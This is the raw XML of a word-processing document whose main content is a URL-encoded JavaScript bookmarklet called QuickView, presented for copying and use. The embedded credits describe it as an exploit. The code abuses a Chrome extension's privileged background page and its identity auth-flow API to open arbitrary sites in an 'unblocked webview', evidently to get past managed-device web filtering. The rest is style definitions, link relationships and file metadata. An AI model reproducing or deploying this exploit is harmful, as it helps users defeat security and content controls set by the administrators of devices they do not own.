        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Bookmarklet (copy everything </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>in the box below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans Mono" w:hAnsi="Noto Sans Mono"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans Mono" w:hAnsi="Noto Sans Mono"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>javascript:!function()%7Bif(%22chrome-extension%3A%2F%2Fbpmcpldpdmajfigpchkicefoigmkfalc%22!%3D%3Dwindow.origin)return%20void%20alert(%22You%20ran%20this%20script%20on%20the%20wrong%20page.%22)%3Bif(window.quickview)return%20void%20alert(%22QuickView%20is%20already%20active%20in%20this%20tab.%22)%3Bwindow.quickview%3D!0%3Blet%20t%3Dt%3D%3Edocument.getElementById(t)%2Cn%3D%7BGoogle%3A%22https%3A%2F%2Fgoogle.com%22%2CYoutube%3A%22https%3A%2F%2Fyoutube.com%22%2CDiscord%3A%22https%3A%2F%2Fdiscord.com%22%2CReddit%3A%22https%3A%2F%2Freddit.com%22%2C%22Titanium%20Network%22%3A%22https%3A%2F%2Ftitaniumnetwork.org%22%7D%2Ce%3Dnull%3Bfunction%20i()%7Blet%20n%3Dt(%22url_input%22).value%3Bn.startsWith(%22https%3A%2F%2F%22)%7C%7Cn.startsWith(%22http%3A%2F%2F%22)%7C%7Calert(%22Warning%3A%20Your%20URL%20does%20not%20begin%20with%20http%3A%2F%2F%20or%20https%3A%2F%2F.%22)%2Co(n)%7Dfunction%20o(t)%7Blet%20n%3D%60data%3Atext%2Fhtml%2C%5Cn%20%20%20%20%3Chtml%3E%5Cn%20%20%20%20%20%20%3Chead%3E%5Cn%20%20%20%20%20%20%20%20%3Cscript%3E%5Cn%20%20%20%20%20%20%20%20%20%20setTimeout(()%20%3D%3E%20%7B%5Cn%20%20%20%20%20%20%20%20%20%20%20%20window.location.href%20%3D%20%22%24%7BencodeURIComponent(t)%7D%22%3B%5Cn%20%20%20%20%20%20%20%20%20%20%7D%2C%20500)%3B%5Cn%20%20%20%20%20%20%20%20%3C%5C%2Fscript%3E%5Cn%20%20%20%20%20%20%3C%2Fhead%3E%5Cn%20%20%20%20%20%20%3Cbody%3E%5Cn%20%20%20%20%20%20%20%20%3Cp%3ERedirecting%20to%20%24%7Bt%7D%3C%2Fp%3E%5Cn%20%20%20%20%20%20%3C%2Fbody%3E%5Cn%20%20%20%20%3C%2Fhtml%3E%60%3Be.chrome.identity.launchWebAuthFlow(%7Burl%3An%2Cinteractive%3A!0%7D%2C(()%3D%3E%7B%7D))%7D!function(t)%7Blet%20n%3Ddocument.createElement(%22iframe%22)%3Bn.style.display%3D%22none%22%2Cn.src%3Dwindow.origin%2B%22%2Fscripts%2Fcommon%2Felements%2Fhyperlink%2Fhyperlink.html%22%2Cn.onload%3D()%3D%3E%7Bt(n.contentWindow.chrome.extension.getBackgroundPage())%2Cn.remove()%7D%2Cdocument.body.append(n)%7D((function(a)%7Be%3Da%2Cdocument.write('%5Cn%20%20%3C!DOCTYPE%20html%3E%5Cn%20%20%3Chtml%3E%5Cn%20%20%20%20%3Chead%3E%5Cn%20%20%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%5Cn%20%20%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%5Cn%20%20%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A%2F%2Ffonts.xz.style%2Fserve%2Finter.css%22%3E%5Cn%20%20%20%20%20%20%3Clink%20rel%3D%22icon%22%20href%3D%22https%3A%2F%2Fquickview-exploit.pages.dev%2Fimg%2Ficon_32.png%22%3E%5Cn%20%20%20%20%20%20%3Ctitle%3EQuickView%20GUI%3C%2Ftitle%3E%5Cn%20%20%20%20%20%20%3Cstyle%3E%5Cn%20%20%20%20%20%20%20%20%5Cn%20%20*%20%7B%5Cn%20%20%20%20font-family%3A%20%22Inter%22%2C%20sans-serif%3B%5Cn%20%20%20%20color%3A%20%23e2e8f0%5Cn%20%20%7D%5Cn%5Cn%20%20body%20%7B%5Cn%20%20%20%20background-color%3A%20%230f172a%3B%5Cn%20%20%7D%5Cn%5Cn%20%20.button%20%7B%5Cn%20%20%20%20background-color%3A%20%231a73e8%3B%5Cn%20%20%20%20text-decoration%3A%20none%3B%5Cn%20%20%20%20user-select%3A%20none%3B%5Cn%20%20%20%20font-size%3A%2014px%3B%5Cn%20%20%20%20padding%3A%2010px%3B%5Cn%20%20%7D%5Cn%5Cn%20%20%23title_div%20%7B%5Cn%20%20%20%20display%3A%20flex%3B%5Cn%20%20%20%20align-items%3A%20center%3B%5Cn%20%20%20%20gap%3A%2016px%3B%5Cn%20%20%7D%20%20%5Cn%5Cn%20%20%23input_div%20%7B%5Cn%20%20%20%20display%3A%20flex%3B%5Cn%20%20%20%20gap%3A%206px%5Cn%20%20%7D%5Cn%5Cn%20%20%23url_input%20%7B%5Cn%20%20%20%20padding%3A%209px%3B%5Cn%20%20%20%20background-color%3A%20%231e293b%3B%5Cn%20%20%20%20border%3A%202px%20solid%20%23334155%3B%5Cn%20%20%20%20width%3A%20100%25%3B%5Cn%20%20%7D%5Cn%5Cn%20%20%23webview_button%20%7B%5Cn%20%20%20%20width%3A%20150px%3B%5Cn%20%20%20%20text-align%3A%20center%3B%5Cn%20%20%7D%5Cn%5Cn%20%20%23content%20%7B%5Cn%20%20%20%20max-width%3A%20600px%3B%5Cn%20%20%20%20margin-left%3A%20auto%3B%5Cn%20%20%20%20margin-right%3A%20auto%3B%5Cn%20%20%7D%5Cn%20%20%20%20%20%20%3C%2Fstyle%3E%5Cn%20%20%20%20%3C%2Fhead%3E%20%5Cn%20%20%20%20%3Cbody%3E%5Cn%20%20%20%20%20%20%3Cdiv%20id%3D%22content%22%3E%5Cn%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22title_div%22%3E%5Cn%20%20%20%20%20%20%20%20%20%20%3Cimg%20id%3D%22icon_img%22%20src%3D%22https%3A%2F%2Fquickview-exploit.pages.dev%2Fimg%2Ficon.png%22%20height%3D%2264px%22%3E%5Cn%20%20%20%20%20%20%20%20%20%20%3Ch1%3EQuickView%3C%2Fh1%3E%5Cn%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%5Cn%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22input_div%22%3E%5Cn%20%20%20%20%20%20%20%20%20%20%3Cinput%20id%3D%22url_input%22%20placeholder%3D%22Enter%20a%20URL%20here.%22%3E%5Cn%20%20%20%20%20%20%20%20%20%20%3Ca%20id%3D%22webview_button%22%20class%3D%22button%22%20href%3D%22%23%22%3EOpen%20Webview%3C%2Fa%3E%5Cn%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%5Cn%20%20%20%20%20%20%20%20%3Cp%3EEnter%20any%20URL%20into%20the%20box%20above%20and%20it%20will%20open%20in%20an%20unblocked%20webview.%20Note%20that%20if%20the%20page%20load%20fails%2C%20the%20webview%20will%20close%20without%20displaying%20anything.%3C%2Fp%3E%5Cn%20%20%20%20%20%20%20%20%3Ch2%3EPreset%20URLs%3A%3C%2Fh2%3E%5Cn%20%20%20%20%20%20%20%20%3Cul%20id%3D%22urls_list%22%3E%3C%2Ful%3E%5Cn%5Cn%20%20%20%20%20%20%20%20%3Ch2%3ECredits%3A%3C%2Fh2%3E%5Cn%20%20%20%20%20%20%20%20%3Cp%3EQuickView%20was%20created%20by%20vk6%237391%20and%20Bypassi%237037%2C%20and%20it%20is%20licensed%20under%20the%20%3Ca%20href%3D%22https%3A%2F%2Fwww.gnu.org%2Flicenses%2Fgpl-3.0.txt%22%20target%3D%22_blank%22%3EGNU%20GPL%20v3%3C%2Fa%3E.%20The%20source%20code%20is%20available%20at%3A%20%3Ca%20href%3D%22https%3A%2F%2Fgithub.com%2Fading2210%2Fquickview%22%20target%3D%22_blank%22%3Ehttps%3A%2F%2Fgithub.com%2Fading2210%2Fquickview%3C%2Fa%3E%3C%2Fp%3E%5Cn%20%20%20%20%20%20%20%20%3Cp%3EThis%20exploit%20is%20part%20of%20the%20%3Ca%20href%3D%22https%3A%2F%2Fgithub.com%2Fswarm-team%22%20target%3D%22_blank%22%3E%7Bswarm%7D%20project%3C%2Fa%3E%20and%20utilizes%20a%20variation%20of%20the%20%3Ca%20href%3D%22https%3A%2F%2Fblog.bypassi.com%2F_%2Fpoint-blank%22%20target%3D%22_blank%22%3Epoint-blank%3C%2Fa%3E%20exploit.%3C%2Fp%3E%5Cn%20%20%20%20%20%20%3C%2Fdiv%3E%5Cn%20%20%20%20%3C%2Fbody%3E%5Cn%20%20%3C%2Fhtml%3E')%2Cfunction()%7Blet%20e%3Dt(%22urls_list%22)%2Ci%3Dt(%22url_input%22)%3Bfor(let%5Bt%2Co%5Dof%20Object.entries(n))%7Blet%20n%3Ddocument.createElement(%22li%22)%2Ca%3Ddocument.createElement(%22a%22)%3Ba.innerHTML%3Dt%2Ca.onclick%3Dfunction()%7Bi.value%3Do%7D%2Ca.href%3D%22%23%22%2Cn.append(a)%2Ce.append(n)%7D%7D()%2Ce.tab_listener%26%26e.chrome.tabs.onUpdated.removeListener(e.tab_listener)%2Ce.tab_listener%3D(t%2Cn%2Ci)%3D%3E%7Bif(%22loading%22!%3D%3Dn.status)return%3Bif(%22https%3A%2F%2Fwww.google.com%2F%23%2520%22!%3Di.url)return%3Be.chrome.tabs.remove(t)%2Ce.popup%3De.open()%3Blet%20a%3De.popup.prompt(%22What%20URL%20would%20you%20like%20to%20open%20a%20webview%20for%3F%22%2C%22https%3A%2F%2Fwww.google.com%22)%3Ba%26%26o(a)%7D%2Ce.chrome.tabs.onUpdated.addListener(e.tab_listener)%2Ct(%22webview_button%22).onclick%3Di%7D))%7D()%3B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>sorry for the url encoding :(</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:orient="landscape" w:w="12240" w:h="11906"/>
      <w:pgMar w:left="0" w:right="0" w:header="0" w:top="0" w:footer="0" w:bottom="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Noto Sans Mono">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>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f7a5d"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BalloonTextChar" w:customStyle="1">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00d85d9f"/>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uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00cc5201"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="720" w:hanging="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00d85d9f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>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f4908"/>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ogle.com/%00" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ading.fr.to/blog/posts/quickview.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/licenses/gpl-3.0.txt" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ading2210/quickview" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swarm-team" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.bypassi.com/_/point-blank/"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LibreOffice/7.0.4.2$Linux_X86_64 LibreOffice_project/00$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>3</Pages>
  <Words>221</Words>
  <Characters>7955</Characters>
  <CharactersWithSpaces>8153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2023-05-04T04:13:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-03T21:51:35Z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